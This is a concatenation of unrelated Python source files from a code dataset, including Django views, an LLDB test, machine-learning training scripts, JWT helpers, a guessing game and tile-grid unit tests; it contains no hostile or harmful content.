{'class':'textfield1'}))\n \n class Meta:\n model = Question\n exclude = ('created', 'user', 'content_type', 'object_id', 'content_object', 'ans_count', 'posted_user')\n\nclass TextWithLength(forms.CharField):\n def __init__(self, *args, **kargs):\n kargs['widget'] = forms.Textarea(attrs={'class':'max-length-%s' % kargs['max_length']})\n super(self.__class__, self).__init__(*args, **kargs)\n \nclass AnswerForm(forms.ModelForm):\n body = TextWithLength(max_length=250)\n class Meta:\n model = Answer\n fields = ('body',)\n \ndef add_question(request, app_label, model_name, obj_id):\n form = QuestionForm(request.POST)\n\n ques_content_id = request.POST['content_object']\n if form.is_valid():\n content_type = ContentType.objects.get_by_natural_key(app_label,model_name)\n form.instance.content_type = content_type\n form.instance.user = request.user\n if int(ques_content_id) != -1:\n form.instance.object_id = ques_content_id\n form.instance.posted_user = request.user.get_full_name()\n form.save()\n ques_dict = Question.QuestionManager.get_question_list( content_type = content_type, object_id = obj_id )\n questions = vote_for_obj_dict( ques_dict, 'answers', 'Question' )\n #ques_form = QuestionForm()\n return render_to_response( 'answers/list_questions.html', locals(), context_instance = RequestContext( request ) )\n else:\n return HttpResponse(\"False\")\n \ndef view_question(request, question_id):\n question = Question.objects.get( id = question_id )\n answers = Answer.objects.filter( question__id = question_id )\n params = {'question': question,\n 'form': AnswerForm(),\n 'answers': answers\n }\n return render_to_response('answers/view_question.html', params, context_instance = RequestContext( request ))\n\ndef answer_question(request, question_id):\n question = get_object_or_404(Question, id=question_id)\n form = AnswerForm(request.POST)\n if form.is_valid():\n if request.user.is_authenticated():\n form.instance.user = request.user\n form.instance.question = question\n form.instance.posted_user = request.user.get_full_name()\n# form.instance.ip = request.META['REMOTE_ADDR']\n form.save()\n return HttpResponseRedirect(reverse('view_question', args=[question_id]))\n\n return render_to_response('answers/answer_question.html', {'form': form, 'question': question},\n context_instance = RequestContext( request ))\n\n \ndef custom_post_comment( request ):\n if request.POST['edit_comment_id'] == \"\":\n post_comment( request ) #call predefined method of comment\n else:\n edit_comment_id = request.POST['edit_comment_id']\n edit_comment = request.POST['comment']\n comment_obj = Comment.objects.get( id = edit_comment_id )\n comment_obj.comment = edit_comment\n comment_obj.is_removed = False\n comment_obj.save()\n\n app, model = request.POST['content_type'].split('.')\n content_object_id = request.POST['object_pk']\n content_type = ContentType.objects.get(app_label=app, model=model)\n article_detail_dict = {'id':content_object_id}\n content_obj = content_type.get_object_for_this_type(id=content_object_id)\n return render_to_response('comments/ajax_post_delete_comment.html', locals(),\n context_instance = RequestContext( request ))\n\ndef custom_post_reply( request ):\n if request.POST['edit_reply_id'] == \"\":\n post_comment( request ) #call predefined method of comment\n else:\n edit_reply_id = request.POST['edit_reply_id']\n edit_comment = request.POST['comment']\n comment_obj = Comment.objects.get( id = edit_reply_id )\n comment_obj.comment = edit_comment\n comment_obj.is_removed = False\n comment_obj.save()\n app, model = request.POST['content_type'].split('.')\n content_object_id = request.POST['object_pk']\n content_type = ContentType.objects.get(app_label=app, model=model)\n comment_obj = Comment.objects.get( id = content_object_id, is_removed = False )\n content_obj = comment_obj.content_type.get_object_for_this_type( id = comment_obj.object_pk)\n return render_to_response('comments/ajax_post_delete_comment.html', locals(),\n context_instance = RequestContext( request ))\n\ndef delete_own_comment(request):\n obj_id, content_type,comment_id=int(request.POST['obj_id']), request.POST['content_type'],int(request.POST['comment_id'])\n comment_obj = get_object_or_404(comments.get_model(), pk=comment_id)\n comment_obj.is_removed = True\n comment_obj.save()\n app, model = content_type.split('.')\n content_type = ContentType.objects.get(app_label=app, model=model)\n\n article_detail_dict = {'id':obj_id}\n content_obj = content_type.get_object_for_this_type(id=obj_id)\n return render_to_response('comments/ajax_post_delete_comment.html', locals(),\n context_instance = RequestContext( request ))\n\ndef reply_page(request):\n comment_id = request.GET['comment_id']\n return render_to_response('comments/reply_page.html', locals(), context_instance = RequestContext( request ))","sub_path":"fghqlnoebnq/sa_answers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571004788","text":"\"\"\"Test that C++ global variables can be inspected by name and also their mangled name.\"\"\"\n\nfrom __future__ import print_function\n\n\nfrom lldbsuite.test.decorators import *\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test import lldbutil\n\n\nclass GlobalVariablesCppTestCase(TestBase):\n\n mydir = TestBase.compute_mydir(__file__)\n\n def setUp(self):\n TestBase.setUp(self)\n self.source = lldb.SBFileSpec('main.cpp')\n\n @expectedFailureAll(oslist=[\"windows\"], bugnumber=\"llvm.org/pr24764\")\n def test(self):\n self.build()\n\n (target, _, _, _) = lldbutil.run_to_source_breakpoint(self, \"// Set break point at this line.\", self.source)\n \n # Check that we can access g_file_global_int by its name\n self.expect(\"target variable g_file_global_int\", VARIABLES_DISPLAYED_CORRECTLY,\n substrs=['42'])\n self.expect(\"target variable abc::g_file_global_int\", VARIABLES_DISPLAYED_CORRECTLY,\n substrs=['42'])\n self.expect(\"target variable xyz::g_file_global_int\", VARIABLES_DISPLAYED_CORRECTLY,\n error=True, substrs=['can\\'t find global variable'])\n\n # Check that we can access g_file_global_int by its mangled name\n addr = target.EvaluateExpression(\"&abc::g_file_global_int\").GetValueAsUnsigned()\n self.assertTrue(addr != 0)\n mangled = lldb.SBAddress(addr, target).GetSymbol().GetMangledName()\n self.assertTrue(mangled != None)\n gv = target.FindFirstGlobalVariable(mangled)\n self.assertTrue(gv.IsValid())\n self.assertEqual(gv.GetName(), \"abc::g_file_global_int\")\n self.assertEqual(gv.GetValueAsUnsigned(), 42)\n","sub_path":"packages/Python/lldbsuite/test/lang/cpp/global_variables/TestCPPGlobalVariables.py","file_name":"TestCPPGlobalVariables.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"464062049","text":"import sys\nsys.path.append(\"..\")\nimport argparse\nfrom glob import glob\nfrom collections import OrderedDict\n\nimport pandas as pd\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn \nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.cuda.amp import autocast \nfrom tensorboardX import SummaryWriter\nimport torch.nn.functional as F\n\nimport yaml\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nimport datetime\nimport matplotlib.pyplot as plt\n\nfrom utils.utils import AverageMeter, str2bool\nfrom online_evaluation import online_evaluation\nfrom model import SpatialConfigurationNet\nfrom loss import LovaszLossSoftmax, LovaszLossHinge, dice_coeff\n\nimport os\nimport sys\nimport random\nimport numpy as np\n\nif os.path.abspath('..') not in sys.path:\n sys.path.insert(0, os.path.abspath('..'))\n\nif os.path.abspath('../..') not in sys.path:\n sys.path.insert(0, os.path.abspath('../..'))\n\nfrom utils.tools import csv_to_catalogue\nfrom DataLoader.dataloader_IVDlocation import get_loader\nfrom NetworkTrainer.network_trainer import NetworkTrainer\n\nDATEINFO = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n\nif __name__ == '__main__':\n\n # added by ChenChen Hu\n print('This script has been modified by Madmax !')\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--batch_size', type=int, default=2,\n help='batch size for training (default: 2)')\n parser.add_argument('--list_GPU_ids', nargs='+', type=int, default=0,\n help='list_GPU_ids for training (default: 0)')\n parser.add_argument('--max_iter', type=int, default=50000,\n help='training iterations(default: 50000)')\n # added by Chenchen Hu\n parser.add_argument('--num_classes', type=int, default=1)\n\n parser.add_argument('--catalogue', type=int, default=0)\n parser.add_argument('--latest', type=int, default=0,\n help='load the latest model')\n parser.add_argument('--model_path', type=str, default='../../../Output/IVD_Location/latest.pkl')\n parser.add_argument('--model_type', type=str, default='SpatialConfigurationNet',\n help='the type of model')\n parser.add_argument('--seed', type=int, default=68,\n help='set the seed')\n\n parser.add_argument('--loss', default='LovaszLoss',\n help='loss function')\n\n parser.add_argument('--lr', '--learning_rate', default=1e-3, type=float,\n metavar='LR', help='initial learning rate')\n parser.add_argument('--momentum', default=0.9, type=float,\n help='momentum')\n parser.add_argument('--weight_decay', default=1e-4, type=float,\n help='weight decay')\n parser.add_argument('--nesterov', default=False, type=str2bool,\n help='nesterov')\n\n args = parser.parse_args()\n\n torch.manual_seed(seed=args.seed)\n random.seed(args.seed)\n np.random.seed(args.seed)\n\n # Start training\n trainer = NetworkTrainer()\n trainer.setting.project_name = 'IVD_Location'\n trainer.setting.output_dir = '../../../Output/IVD_Location'\n list_GPU_ids = args.list_GPU_ids\n csv_path = '../../Catalogue' + '/' + str(args.catalogue) + '.csv'\n catalogue = csv_to_catalogue(csv_path)\n\n # setting.network is an object\n if args.model_type == 'SpatialConfigurationNet':\n trainer.setting.network = SpatialConfigurationNet(num_labels=20)\n print('Loading SpatialConfigurationNet!')\n\n trainer.setting.max_iter = args.max_iter\n\n trainer.setting.train_loader = get_loader(\n catalogue=catalogue,\n batch_size=args.batch_size, # 2\n num_samples_per_epoch=args.batch_size * 500,\n num_works=4,\n phase='train'\n )\n\n trainer.setting.val_loader = get_loader(\n catalogue=catalogue,\n batch_size=1,\n num_samples_per_epoch=len(list(catalogue['val'].dropna())),\n num_works=4,\n phase='val'\n )\n\n trainer.setting.eps_train_loss = 0.01\n trainer.setting.lr_scheduler_update_on_iter = True\n if args.loss == 'BCEWithLogitsLoss':\n trainer.setting.loss_function = nn.BCEWithLogitsLoss()\n elif args.loss == 'MSE':\n trainer.setting.loss_function = nn.MSELoss()\n elif args.loss == 'L1smooth':\n trainer.setting.loss_function = nn.SmoothL1Loss()\n elif args.loss == 'LovaszLoss':\n if args.num_classes > 1:\n trainer.setting.loss_function = LovaszLossSoftmax()\n else:\n trainer.setting.loss_function = LovaszLossHinge()\n trainer.setting.online_evaluation_function_val = online_evaluation\n\n # optimizer\n params = filter(lambda p: p.requires_grad, trainer.setting.network.parameters())\n trainer.set_optimizer(optimizer_type='Adam',\n args={\n 'lr': 1e-3,\n 'weight_decay': 1e-4,\n 'momentum': 0.9,\n 'nesterov': False\n },\n params = params\n )\n\n trainer.set_lr_scheduler(lr_scheduler_type='cosine',\n cfgs={\n 'T_max': args.max_iter,\n 'eta_min': 1e-7,\n 'last_epoch': -1\n }\n )\n\n if not os.path.exists(trainer.setting.output_dir):\n os.mkdir(trainer.setting.output_dir)\n trainer.set_GPU_device(list_GPU_ids)\n\n # added by Chenchen Hu\n # load the latest model when the recovery is True and the model exists.\n if args.latest and os.path.exists(args.model_path):\n trainer.init_trainer(ckpt_file=args.model_path,\n list_GPU_ids=list_GPU_ids,\n only_network=False)\n\n trainer.run()\n\n trainer.print_log_to_file('# Done !\\n', 'a')","sub_path":"Src/SVVNet/Ver&IVDLocation/train_ivdLocation.py","file_name":"train_ivdLocation.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"289530193","text":"import json\nimport codecs\n\ninputfile = 'Directors.txt'\ninputfile1 = 'NomsActors.txt'\n\n\nwith codecs.open(inputfile1, 'r', encoding='utf-8', errors = 'ignore') as file1:\n\tdata = [row.strip().split('\\t') for row in file1]\n\tdicc = {}\n\n\tfor row in data:\n\t\tkey = row[0]\n\t\tval = row[1]\n\t\tdicc[key] = val\n\nwith codecs.open(inputfile, 'r', encoding='utf-8', errors = 'ignore') as file:\n\tdata1 = [row.strip().split(' ') for row in file]\n\n\to = open('DirectorsPelis.txt', 'w')\n\tfor row in data1:\n\t\tif row[1] in dicc:\n\t\t\trow[1] = dicc[row[1]]\n\t\t\to.write(str(row))\n\t\t\to.write('\\n')\n\n\n\n\n\n\n\n\n","sub_path":"w2watch/Database/llista_Directors.py","file_name":"llista_Directors.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"192763592","text":"from authlib.jose import jwt\nfrom .models import User\n\nimport os\nimport time\nimport json\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nsecret_file = os.path.join(BASE_DIR, \"secret.json\")\n\n\nwith open(secret_file) as f:\n secret = json.loads(f.read())\n\n\ndef get_secret(setting, secret=secret):\n try:\n return secret[setting]\n except:\n error_msg = \"Set key '{0}' in secret.json\".format(setting)\n raise ImproperlyConfigured(error_msg)\n\n\nSECRET_JWT = get_secret(\"SECRET_JWT\")\n\n\ndef token_generator(property, value):\n header = {\"alg\": \"HS256\", \"typ\": \"JWT\"}\n payload = {\n \"iss\": \"jellyfish\",\n \"exp\": 1500000,\n \"iat\": int(round(time.time() * 1000)),\n }\n payload[property] = value\n token = jwt.encode(header, payload, SECRET_JWT)\n return token\n\n\ndef decode_token(token):\n claims = jwt.decode(token, SECRET_JWT)\n return claims\n","sub_path":"secondhand_server/user/jwt_auth.py","file_name":"jwt_auth.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"633608078","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef add_layer(inputs,in_size,out_size,activation_function=None):\n #随机变量,形状 in_size行 out_size列的随机矩阵\n Weight=tf.Variable(tf.random_normal([in_size,out_size]))\n #1行 out_size列的0.1矩阵\n biases=tf.Variable(tf.zeros([1,out_size])+0.1)\n #尚未被激活的值\n Wx_plus_b=tf.matmul(inputs,Weight)+biases\n\n if activation_function is None:\n outputs=Wx_plus_b\n else:\n #使用传进来的激励函数\n outputs=activation_function(Wx_plus_b)\n return outputs\n\n\n#开始端-1 结束端-1 分割300个数据,1行300列\nx_data = np.linspace(-1, 1, 300, dtype=np.float32)[:, np.newaxis]\nnoise = np.random.normal(0, 0.05, x_data.shape).astype(np.float32)\n#平方-0.5加上噪声,y_data为一行300列的随机值\ny_data = np.square(x_data) - 0.5 + noise\n\n#利用占位符定义我们所需的神经网络的输入。 tf.placeholder()就是代表占位符,\n# 这里的None代表无论输入有多少都可以,因为输入只有一个特征,所以这里是1\nxs = tf.placeholder(tf.float32, [None, 1])\nys = tf.placeholder(tf.float32, [None, 1])\n\n#定义隐藏层,使用 Tensorflow 自带的激励函数tf.nn.relu\nlay = add_layer(xs, 1, 10, activation_function=tf.nn.relu)#输入1列输出10列\n#定义输出层,结果\nprediction = add_layer(lay, 10, 1, activation_function=None)#输入10列输出1列\n\n#计算预测值prediction和真实值的误差,对二者差的平方求和再取平均。\nloss = tf.reduce_mean(tf.reduce_sum(tf.square(ys - prediction),reduction_indices=[1]))\n\n#tf.train.GradientDescentOptimizer()中的值通常都小于1。\n# 这里取的是0.1,代表以0.1的效率来最小化误差loss\ntrain_step = tf.train.GradientDescentOptimizer(0.1).minimize(loss)#梯度优化\n\n#变量初始化\ninit = tf.global_variables_initializer()\nsess = tf.Session()\nsess.run(init)\n\n#训练1000次\n#机器学习的内容是train_step, 用 Session 来 run 每一次 training 的数据,逐步提升神经网络的预测准确性。\nfor i in range(1000):\n # training\n sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\n #每50步我们输出一下机器学习的误差。\n if i % 50 == 0:\n # to see the step improvement\n print(sess.run(loss, feed_dict={xs: x_data, ys: y_data}))\n\n# plot the real data\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\nax.scatter(x_data, y_data)\nplt.ion()#本次运行请注释,全局运行不要注释\n#每隔50次训练刷新一次图形,用红色、宽度为5的线来显示我们的预测数据和输入之间的关系,并暂停0.1s。\nfor i in range(1000):\n # training\n sess.run(train_step, feed_dict={xs: x_data, ys: y_data})\n if i % 50 == 0:\n # to visualize the result and improvement\n try:\n ax.lines.remove(lines[0])\n except Exception:\n pass\n prediction_value = sess.run(prediction, feed_dict={xs: x_data})\n # plot the prediction\n lines = ax.plot(x_data, prediction_value, 'r-', lw=5)\n plt.pause(0.1)\n\nplt.show()","sub_path":"beginLearn/tensorfw2/tensorfw_activation.py","file_name":"tensorfw_activation.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167745135","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'website'\nurlpatterns = {\n path('', views.index, name='index'),\n path('country/', views.list_country, name='country'),\n path('sunshine/', views.list_sunshine, name='sunshine'),\n path('spring-city/', views.list_spring, name='spring-city'),\n}\n","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"419904442","text":"import glob\nimport os\n\nimport numpy as np\nimport pandas as pd\nfrom statsmodels.stats import multitest\nfrom utils import load_pickle\n\nif __name__ == \"__main__\":\n subjects = sorted(\n glob.glob(\n '/scratch/gpfs/hgazula/podcast-encoding/results/no-shuffle/*'))\n\n hemisphere_indicator = load_pickle(\n '/scratch/gpfs/hgazula/podcast_hemisphere_indicator.pkl')\n\n lags = np.arange(-2000, 2001, 25)\n\n pval_dict = dict()\n some_list = []\n for subject in subjects:\n subject_key = os.path.basename(subject)\n\n shuffle_elec_file_list = sorted(\n glob.glob(\n os.path.join(\n '/scratch/gpfs/hgazula/podcast-encoding/results/phase-shuffle',\n os.path.basename(subject), '*.csv')))\n\n main_elec_file_list = sorted(\n glob.glob(\n os.path.join(\n '/scratch/gpfs/hgazula/podcast-encoding/results/no-shuffle',\n os.path.basename(subject), '*.csv')))\n\n # curr_key = hemisphere_indicator.get(int(subject_key), None)\n\n # if not curr_key:\n # pass\n # elif len(curr_key) == 2:\n # shuffle_elec_file_list = list(\n # filter(lambda x: os.path.basename(x).startswith(('L', 'DL')),\n # shuffle_elec_file_list))\n # main_elec_file_list = list(\n # filter(lambda x: os.path.basename(x).startswith(('L', 'DL')),\n # main_elec_file_list))\n # elif len(curr_key) == 1 and 'RH' in curr_key:\n # continue\n # else:\n # pass\n\n a = [os.path.basename(item) for item in shuffle_elec_file_list]\n b = [os.path.basename(item) for item in main_elec_file_list]\n\n assert set(a) == set(b), \"Mismatch: Electrode Set\"\n\n for elec_file1, elec_file2 in zip(shuffle_elec_file_list,\n main_elec_file_list):\n elecname1 = os.path.split(os.path.splitext(elec_file1)[0])[1]\n elecname2 = os.path.split(os.path.splitext(elec_file2)[0])[1]\n\n assert elecname1 == elecname2, 'Mismatch: Electrode Name'\n\n if elecname1.startswith(('SG', 'ECGEKG', 'EEGSG')):\n continue\n\n perm_result = pd.read_csv(elec_file1, header=None).values\n rc_result = pd.read_csv(elec_file2, header=None).values\n\n assert perm_result.shape[1] == rc_result.shape[\n 1], \"Mismatch: Number of Lags\"\n\n if perm_result.shape[1] != len(lags):\n print('perm is wrong length')\n else:\n omaxs = np.max(perm_result, axis=1)\n\n s = 1 - (sum(np.max(rc_result) > omaxs) / perm_result.shape[0])\n some_list.append((subject_key, elecname1, s))\n\n df = pd.DataFrame(some_list, columns=['subject', 'electrode', 'score'])\n thresh = 0.01\n\n # df1 = df.copy(deep=True)\n # flag = np.logical_or(np.isclose(df1.score.values, thresh, atol=1e-6), df1.score.values > thresh)\n\n # df1 = df1[flag]\n # df1['electrode'] = df1['electrode'].str.strip('_comp')\n # df1.to_csv('pre_fdr.csv',\n # index=False,\n # columns=['subject', 'electrode'])\n\n _, pcor, _, _ = multitest.multipletests(df.score.values,\n method='fdr_bh',\n is_sorted=False)\n\n flag = np.logical_or(np.isclose(pcor, thresh), pcor < thresh)\n\n df = df[flag]\n df['electrode'] = df['electrode'].str.strip('_comp')\n df.to_csv('post_fdr.csv', index=False, columns=['subject', 'electrode'])\n\n filter_hemisphere = []\n for row in df.itertuples(index=False):\n subject = row.subject\n electrode = row.electrode\n\n curr_key = hemisphere_indicator.get(int(subject), None)\n\n if not curr_key:\n if int(subject) == 798:\n filter_hemisphere.append((subject, electrode)) \n elif len(curr_key) == 2:\n if electrode.startswith(('L', 'DL')):\n filter_hemisphere.append((subject, electrode))\n elif len(curr_key) == 1 and 'RH' in curr_key:\n continue\n else:\n filter_hemisphere.append((subject, electrode))\n\n df2 = pd.DataFrame(filter_hemisphere, columns=['subject', 'electrode'])\n df2.to_csv('post_fdr_lh.csv', index=False, columns=['subject', 'electrode'])\n\n# phase-1000-sig-elec-glove50d-perElec-FDR-01-LH-hg","sub_path":"code/podenc_sigelec_fdr.py","file_name":"podenc_sigelec_fdr.py","file_ext":"py","file_size_in_byte":4476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358584467","text":"def US_28(self):\n result = []\n temp=[]\n p=[]\n for key, family in self._family.items():\n result1 = []\n list_children = family._children\n if list_children != \"NA\":\n for child in list_children:\n result1.append(self._individual[child])\n result1.sort(key=lambda x:self._individual[child]._age,reverse=False)\n if len(result1)>1:\n result.append(\"List of siblings\" +family._family+ \"after sorting is\")\n for child in result1:\n if child._age >= 0:\n temp.append(str(len(str(child._age)))+\" \"+str(child._age)+\" :- \"+child._name +\" from FamID \"+family._family)\n temp=list(set(temp))\n for _ in sorted(temp,reverse=True):\n x=_.split(\" \")\n y=\" \".join(map(str,x[1:]))\n p.append(y)\n return sorted(p,reverse=True)\n","sub_path":"US_28.py","file_name":"US_28.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"179016277","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 22 18:07:51 2014\n\n@author: Guillaume\n\"\"\"\n\nalph = \"abcdefghijklmnopqrstuvxyz\"\nlettre = list(alph)\nfor i in range(0, 25):\n for j in range(0, 25):\n print(lettre[i], lettre[j], \"\\n\")\n","sub_path":"exercices/060/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599916729","text":"#Sayı tahmin oyunu\nimport random\nimport time\n\ndenemeSayisi = 1\nprint(\"Sayı tahmin oyununa hoşgeldiniz.\")\n\n\nwhile True:\n while True:\n answer = input(\"Yeni oyuna başla ? (y/n) : \")\n if(answer == 'y' or answer == 'n'):\n break\n else:\n print(\"Lütfen sadece y yada n harflerinden birini giriniz\")\n \n if(answer == 'n'):\n print(\"Katıldığınız için teşekkürler.\")\n exit()\n \n rsayi = random.randint(0,100)\n print(\"Sayınız oluşturuldu.\")\n \n startTime = time.time()\n\n while (answer == 'y'):\n cevap = int(input(\"Cevabınız : \"))\n if(cevap == rsayi):\n print(\"Tebrikler cevabınız doğru.\",end = ' ')\n break\n elif(cevap > rsayi):\n print(\"Sayıdan büyüktür.\")\n else:\n print(\"Sayidan küçüktür.\")\n denemeSayisi += 1\n\n endTime = time.time()\n print(f\"Tahmin süreniz {round((endTime-startTime),2)} saniyedir. Deneme sayınız : {denemeSayisi}\")\n","sub_path":"Python uygulamaları/sayiTahminOyunu.py","file_name":"sayiTahminOyunu.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"226186024","text":"import pytest\nfrom unittest import TestCase\nimport numpy as np\n\nfrom ..tile import Tile, Grid\nfrom ..exceptions import (\n InvalidLatLonError,\n InvalidRowColError,\n InvalidTileError,\n InvalidShapeError,\n)\n\n\nclass TileTest(TestCase):\n \"\"\"Tests Tile class\"\"\"\n\n def test_from_key_1(self):\n key = '2048:16:30.2:15:3:80'\n tile = Tile.from_key(key)\n assert tile.key == key\n assert tile.zone == 15\n assert tile.resolution == 30.2\n assert tile.tilesize == 2048\n assert tile.path == 3\n assert tile.row == 80\n\n def test_from_key_2(self):\n key = '2048:16:30:15:-5:15' # no decimal in key\n tile = Tile.from_key(key)\n assert tile.key == '2048:16:30.0:15:-5:15' # decimal included\n assert tile.resolution == 30\n assert tile.path == -5\n assert tile.row == 15\n\n def test_get_invalid_dlkey_1(self):\n invalid_key = \"2048:16:30.0:0:3:80\" # tilesize must be greater than zero\n with pytest.raises(InvalidTileError):\n Tile.from_key(invalid_key)\n\n def test_get_invalid_dlkey_2(self):\n invalid_key = \"blah:16:30.0:1:3:80\" # invalid type\n with pytest.raises(InvalidTileError):\n Tile.from_key(invalid_key)\n\n def test_get_invalid_dlkey_3(self):\n invalid_key = \"2048:16.4:30.0:15:3:80\" # pad must be int\n with pytest.raises(InvalidTileError):\n Tile.from_key(invalid_key)\n\n def test_dlkeys_subtile(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 1024,\n \"pad\": 0,\n }\n sub = 8\n lat, lon = 35.691544, -105.944183\n\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n tiles = [t for t in tile.subtile(sub)]\n assert len(tiles) == sub * sub\n for t in tiles:\n assert t.tilesize == params[\"tilesize\"] // sub\n\n def test_dlkeys_subtile_with_params(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 1024,\n \"pad\": 0,\n }\n new_resolution = 2\n new_pad = 13\n sub = 4\n lat, lon = 35.691544, -105.944183\n\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n tiles = [t for t in tile.subtile(sub, new_resolution=new_resolution, new_pad=new_pad)]\n assert len(tiles) == sub * sub\n for t in tiles:\n assert np.allclose(\n t.tilesize * new_resolution * sub,\n params[\"tilesize\"] * params[\"resolution\"]\n )\n assert t.pad == new_pad\n assert t.resolution == new_resolution\n\n def test_dlkeys_subtile_error_1(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 1024,\n \"pad\": 0,\n }\n sub = 11 # does not evenly divide tilesize\n lat, lon = 35.691544, -105.944183\n\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n with pytest.raises(InvalidTileError):\n [t for t in tile.subtile(sub)]\n\n def test_dlkeys_subtile_error_2(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 1024,\n \"pad\": 0,\n }\n sub = 8\n lat, lon = 35.691544, -105.944183\n\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n with pytest.raises(InvalidTileError):\n [t for t in tile.subtile(sub, new_resolution=13)] # does not divide\n\n def test_rowcol_conversions(self):\n # get a polar tile\n tile = Grid(tilesize=1000, resolution=1000, pad=0).tile_from_lonlat(lon=0.0, lat=90.0)\n x, y = 567, 133\n lon, lat = tile.rowcol_to_lonlat(x, y)\n row, col = tile.lonlat_to_rowcol(lon, lat)\n assert row == x\n assert col == y\n\n def test_invalid_rowcol(self):\n tile = Grid(tilesize=1000, resolution=1000, pad=0).tile_from_lonlat(lon=0.0, lat=90.0)\n x, y = [1, 1, 2, 3, 5], [42]\n with pytest.raises(InvalidRowColError):\n lon, lat = tile.rowcol_to_lonlat(x, y)\n\n def test_assign(self):\n tile1 = Tile.from_key(\"2048:16:0.2:15:3:80\")\n assert tile1.resolution == 0.2\n tile2 = tile1.assign(resolution=1)\n assert tile2.resolution == 1\n assert tile1.pad == tile2.pad\n assert tile1.tilesize == tile2.tilesize\n\n def test_bad_assign(self):\n tile1 = Tile.from_key(\"2048:16:0.2:15:3:80\")\n with pytest.raises(InvalidTileError):\n # incompatible resolution and tilesize\n tile1.assign(resolution=1, tilesize=512)\n\n\nclass GridTest(TestCase):\n \"\"\"Tests Grid class\"\"\"\n\n def test_make_invalid_grid(self):\n with pytest.raises(InvalidTileError):\n Grid(tilesize=0, resolution=1000, pad=0)\n\n def test_from_latlon(self):\n params = {\n \"tilesize\": 1,\n \"resolution\": 1.5,\n \"pad\": 99\n }\n lat, lon = (61.91, 5.26)\n tile = Grid(**params).tile_from_lonlat(lon, lat)\n assert tile.tilesize == params[\"tilesize\"]\n assert tile.pad == params[\"pad\"]\n assert tile.tile_extent == params[\"tilesize\"] + 2 * params[\"pad\"]\n assert np.allclose(\n [\n tile.polygon.centroid.xy[0][0],\n tile.polygon.centroid.xy[1][0],\n ],\n [lon, lat]\n )\n\n def test_dlkeys_from_invalid_latlon(self):\n lat, lon = -97.635, 212.723\n params = {\"resolution\": 60.0, \"tilesize\": 512, \"pad\": 0}\n with pytest.raises(InvalidLatLonError):\n Grid(**params).tile_from_lonlat(0, lat)\n with pytest.raises(InvalidLatLonError):\n Grid(**params).tile_from_lonlat(lon, 0)\n\n def test_tiles_from_shape_1(self):\n params = {\n \"resolution\": 10,\n \"tilesize\": 2048,\n \"pad\": 16,\n }\n shape = \"\"\"{\"coordinates\":\n [[[-90.1897158, 44.2267595],\n [-87.9570052, 43.8067829],\n [-88.5766841, 42.1269533],\n [-90.7457357, 42.5435965],\n [-90.1897158, 44.2267595]]],\n \"type\": \"Polygon\"}\"\"\"\n\n grid = Grid(**params)\n gen = grid.tiles_from_shape(shape)\n tiles = [tile for tile in gen]\n assert len(tiles) == len(set(tiles))\n assert len(tiles) == 115\n\n est_ntiles = grid._estimate_ntiles_from_shape(shape)\n assert len(tiles) > (est_ntiles // 2)\n assert len(tiles) < (est_ntiles * 2)\n\n def test_tiles_from_shape_2(self):\n params = {\n \"resolution\": 1,\n \"tilesize\": 128,\n \"pad\": 8,\n }\n shape = {\n \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [[\n [-122.51140471760839, 37.77130087547876],\n [-122.45475646845254, 37.77475476721895],\n [-122.45303985468301, 37.76657207194229],\n [-122.51057242081689, 37.763446782666094],\n [-122.51140471760839, 37.77130087547876]]\n ]},\n \"properties\": None\n }\n\n grid = Grid(**params)\n gen = Grid(**params).tiles_from_shape(shape)\n tiles = [tile for tile in gen]\n assert len(tiles) == len(set(tiles))\n assert len(tiles) == 325\n\n est_ntiles = grid._estimate_ntiles_from_shape(shape)\n assert len(tiles) > (est_ntiles // 2)\n assert len(tiles) < (est_ntiles * 2)\n\n def 